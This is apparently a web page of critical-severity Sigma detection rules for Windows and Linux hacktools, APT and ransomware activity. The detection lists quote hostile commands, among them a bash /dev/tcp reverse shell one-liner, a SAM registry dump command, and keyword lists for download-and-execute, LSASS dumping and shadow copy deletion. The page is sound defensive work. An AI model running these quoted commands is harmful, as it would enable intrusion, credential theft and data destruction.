level: critical
Convert to SIEM query
critical
HackTool - SecurityXploded Execution
Detects the execution of SecurityXploded Tools
view Sigma YAML
title: HackTool - SecurityXploded Execution
id: 7679d464-4f74-45e2-9e01-ac66c5eb041a
status: stable
description: Detects the execution of SecurityXploded Tools
references:
- https://securityxploded.com/
- https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-02-04
tags:
- attack.credential-access
- attack.t1555
logsource:
category: process_creation
product: windows
detection:
selection:
- Company: SecurityXploded
- Image|endswith: 'PasswordDump.exe'
- OriginalFileName|endswith: 'PasswordDump.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - SharpUp PrivEsc Tool Execution
Detects the use of SharpUp, a tool for local privilege escalation
view Sigma YAML
title: HackTool - SharpUp PrivEsc Tool Execution
id: c484e533-ee16-4a93-b6ac-f0ea4868b2f1
status: test
description: Detects the use of SharpUp, a tool for local privilege escalation
references:
- https://github.com/GhostPack/SharpUp
author: Florian Roth (Nextron Systems)
date: 2022-08-20
modified: 2023-02-13
tags:
- attack.persistence
- attack.privilege-escalation
- attack.discovery
- attack.execution
- attack.stealth
- attack.t1615
- attack.t1569.002
- attack.t1574.005
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\SharpUp.exe'
- Description: 'SharpUp'
- CommandLine|contains:
- 'HijackablePaths'
- 'UnquotedServicePath'
- 'ProcessDLLHijack'
- 'ModifiableServiceBinaries'
- 'ModifiableScheduledTask'
- 'DomainGPPPassword'
- 'CachedGPPPassword'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
view Sigma YAML
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
- https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - SysmonEOP Execution
Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
view Sigma YAML
title: HackTool - SysmonEOP Execution
id: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
status: test
description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
references:
- https://github.com/Wh04m1001/SysmonEoP
author: Florian Roth (Nextron Systems)
date: 2022-12-04
modified: 2024-11-23
tags:
- cve.2022-41120
- attack.t1068
- attack.privilege-escalation
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith: '\SysmonEOP.exe'
selection_hash:
Hashes|contains:
- 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'
- 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
HackTool - Windows Credential Editor (WCE) Execution
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.
It is often used by threat actors for credential dumping and lateral movement within compromised networks.
view Sigma YAML
title: HackTool - Windows Credential Editor (WCE) Execution
id: 7aa7009a-28b9-4344-8c1f-159489a390df
status: test
description: |
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.
It is often used by threat actors for credential dumping and lateral movement within compromised networks.
references:
- https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2025-10-21
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0005
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- '\WCE.exe'
- '\WCE64.exe'
selection_hash:
Hashes|contains:
- 'IMPHASH=136F0A8572C058A96436C82E541E4C41'
- 'IMPHASH=589657C64DDE88533186C39F82FA1F50'
- 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'
- 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'
- 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'
- 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'
- 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'
- 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'
- 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Hacktool Execution - Imphash
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
view Sigma YAML
title: Hacktool Execution - Imphash
id: 24e3e58a-646b-4b50-adef-02ef935b9fc8
status: test
description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2024-11-23
tags:
- attack.credential-access
- attack.resource-development
- attack.t1588.002
- attack.t1003
logsource:
category: process_creation
product: windows
detection:
selection:
Hashes|contains: # Sysmon field hashes contains all types
- IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
- IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
- IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam
- IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato
- IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato
- IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG
- IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato
- IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato
- IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato
- IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato
- IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump
- IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump
- IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump
- IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump
- IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump
- IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump
- IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump
- IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump
- IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump
- IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX
- IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump
- IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump
- IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump
- IMPHASH=730073214094CD328547BF1F72289752 # Htran
- IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons
- IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons
- IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons
- IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons
- IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump
- IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump
- IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump
- IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump
- IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump
- IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump
- IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump
- IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump
- IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump
- IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump
- IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump
- IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump
- IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump
- IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump
- IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump
- IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump
- IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump
- IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz
- IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz
- IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader
- IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader
- IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
- IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
- IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump
- IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi
- IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi
- IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi
- IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi
- IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi
- IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi
- IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi
- IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi
- IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi
- IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi
- IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi
- IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE
- IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE
- IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers
- IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert
- IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert
- IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert
- IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
- IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet
- IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook
- IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz
- IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller
- IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller
- IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab
- IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab
- IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab
- IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia
- IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast
- IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast
- IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast
- IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast
- IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast
- IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast
- IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast
- IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer
- IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher
condition: selection
falsepositives:
- Legitimate use of one of these tools
level: critical
Convert to SIEM query
critical
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
view Sigma YAML
title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
id: 3be82d5d-09fe-4d6a-a275-0d40d234d324
status: test
description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
references:
- https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
- https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
author: Florian Roth (Nextron Systems)
date: 2021-11-22
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.t1068
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith: '\msiexec.exe'
TargetFilename|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application'
TargetFilename|endswith: '\elevation_service.exe'
condition: selection
falsepositives:
- Unknown
- Possibly some Microsoft Edge upgrades
level: critical
Convert to SIEM query
critical
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
view Sigma YAML
title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
- id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
type: obsolete
status: test
description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
- https://www.hvs-consulting.de/lazarus-report/
author: Florian Roth (Nextron Systems), wagga
date: 2020-12-23
modified: 2023-03-10
tags:
- attack.g0032
- attack.execution
- attack.t1059
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_generic:
CommandLine|contains:
- 'reg.exe save hklm\sam %temp%\~reg_sam.save'
- '1q2w3e4r@#$@#$@#$'
- ' -hp1q2w3e4 '
- '.dat data03 10000 -p '
selection_netstat:
CommandLine|contains|all:
- 'netstat -aon | find '
- 'ESTA'
- ' > %temp%\~'
# Network share discovery
selection_network_discovery:
CommandLine|contains|all:
- '.255 10 C:\ProgramData\IBM\'
- '.DAT'
selection_persistence:
CommandLine|contains|all:
- ' /c '
- ' -p 0x'
CommandLine|contains:
- 'C:\ProgramData\'
- 'C:\RECYCLER\'
selection_rundll32:
CommandLine|contains|all:
- 'rundll32 '
- 'C:\ProgramData\'
CommandLine|contains:
- '.bin,'
- '.tmp,'
- '.dat,'
- '.io,'
- '.ini,'
- '.db,'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Leviathan Registry Key Activity
Detects registry key used by Leviathan APT in Malaysian focused campaign
view Sigma YAML
title: Leviathan Registry Key Activity
id: 70d43542-cd2d-483c-8f30-f16b436fd7db
status: test
description: Detects registry key used by Leviathan APT in Malaysian focused campaign
references:
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
author: Aidan Bracher
date: 2020-07-07
modified: 2023-09-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
condition: selection
level: critical
Convert to SIEM query
critical
Linux Reverse Shell Indicator
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
view Sigma YAML
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
view Sigma YAML
title: LockerGoga Ransomware Activity
id: 74db3488-fd28-480a-95aa-b7af626de068
status: stable
description: Detects LockerGoga ransomware activity via specific command line.
references:
- https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a
- https://blog.f-secure.com/analysis-of-lockergoga-ransomware/
- https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
author: Vasiliy Burov, oscd.community
date: 2020-10-18
modified: 2023-02-03
tags:
- attack.impact
- attack.t1486
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-i SM-tgytutrc -s'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
view Sigma YAML
title: Mailbox Export to Exchange Webserver
id: 516376b4-05cd-4122-bae0-ad7641c38d48
status: test
description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
references:
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
date: 2021-08-09
modified: 2023-04-30
tags:
- attack.persistence
- attack.t1505.003
logsource:
service: msexchange-management
product: windows
detection:
export_command:
'|all':
- 'New-MailboxExportRequest'
- ' -Mailbox '
export_params:
- '-FilePath "\\\\' # We care about any share location.
- '.aspx'
role_assignment:
'|all':
- 'New-ManagementRoleAssignment'
- ' -Role "Mailbox Import Export"'
- ' -User '
condition: (export_command and export_params) or role_assignment
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
view Sigma YAML
title: Malicious DLL Load By Compromised 3CXDesktopApp
id: d0b65ad3-e945-435e-a7a9-438e62dd48e9
related:
- id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
type: similar
- id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
type: similar
- id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
type: similar
- id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
type: similar
- id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec
type: similar
- id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc
type: similar
- id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update
type: similar
status: test
description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
references:
- https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-31
modified: 2024-11-23
tags:
- detection.emerging-threats
- attack.stealth
logsource:
category: image_load
product: windows
detection:
selection:
Hashes|contains:
# ffmpeg.dll
- 'SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896'
- 'SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429'
- 'MD5=74BC2D0B6680FAA1A5A76B27E5479CBC'
# d3dcompiler_47.dll
- 'SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03'
- 'SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E'
- 'MD5=82187AD3F0C6C225E2FBA0C867280CC9'
# Inner object from ffmpeg.dll
- 'SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952'
- 'SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30'
- 'MD5=11BC82A9BD8297BD0823BCE5D6202082'
# ICONIC Stealer payload
- 'SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423'
- 'SHA1=3B3E778B647371262120A523EB873C20BB82BEAF'
- 'MD5=7FAEA2B01796B80D180399040BB69835'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
view Sigma YAML
title: Malicious Named Pipe Created
id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
status: test
description: Detects the creation of a named pipe seen used by known APTs or malware.
references:
- https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/
- https://securelist.com/faq-the-projectsauron-apt/75533/
- https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
- https://www.us-cert.gov/ncas/alerts/TA17-117A
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
- https://thedfirreport.com/2020/06/21/snatch-ransomware/
- https://github.com/RiccardoAncarani/LiquidSnake
- https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
- https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: Florian Roth (Nextron Systems), blueteam0ps, elhoim
date: 2017-11-06
modified: 2023-08-07
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName:
- '\46a676ab7f179e511e30dd2dc41bd388' # Project Sauron
- '\583da945-62af-10e8-4902-a8f205c72b2e' # SolarWinds SUNBURST malware
- '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake
- '\9f81f59bc58452127884ce513865ed20' # Project Sauron
- '\adschemerpc' # Turla HyperStack
- '\ahexec' # Sofacy group malware
- '\AnonymousPipe' # Hidden Cobra Hoplight
- '\bc31a7' # Pacifier
- '\bc367' # Pacifier
- '\bizkaz' # Snatch Ransomware
- '\csexecsvc' # CSEXEC default
- '\dce_3d' # Qbot
- '\e710f28d59aa529d6792ca6ff0ca1b34' # Project Sauron
- '\gruntsvc' # Covenant default
- '\isapi_dg' # Uroburos Malware
- '\isapi_dg2' # Uroburos Malware
- '\isapi_http' # Uroburos Malware
- '\jaccdpqnvbrrxlaf' # PoshC2 default
- '\lsassw' # Wild Neutron APT malware
- '\NamePipe_MoreWindows' # Cloud Hopper - RedLeaves
- '\pcheap_reuse' # Pipe used by Equation Group malware
- '\Posh*' # PoshC2 default
- '\rpchlp_3' # Project Sauron
- '\sdlrpc' # Cobra Trojan
- '\svcctl' # Crackmapexec smbexec default
- '\testPipe' # Emissary Panda Hyperbro
- '\winsession' # Wild Neutron APT malware
# - '\status_*' # CS default https://github.com/SigmaHQ/sigma/issues/253
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
view Sigma YAML
title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains|all:
- 'aspera'
- '\ruby'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re:
- '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- 'net\s+user'
- 'net\s+group'
- 'query\s+session'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
view Sigma YAML
title: Mint Sandstorm - ManageEngine Suspicious Process Execution
id: 58d8341a-5849-44cd-8ac8-8b020413a31b
status: test
description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent_path:
ParentImage|contains:
- 'manageengine'
- 'ServiceDesk'
selection_parent_image:
ParentImage|contains: '\java'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- CommandLine|re: 'net\s+user'
- CommandLine|re: 'net\s+group'
- CommandLine|re: 'query\ssession'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
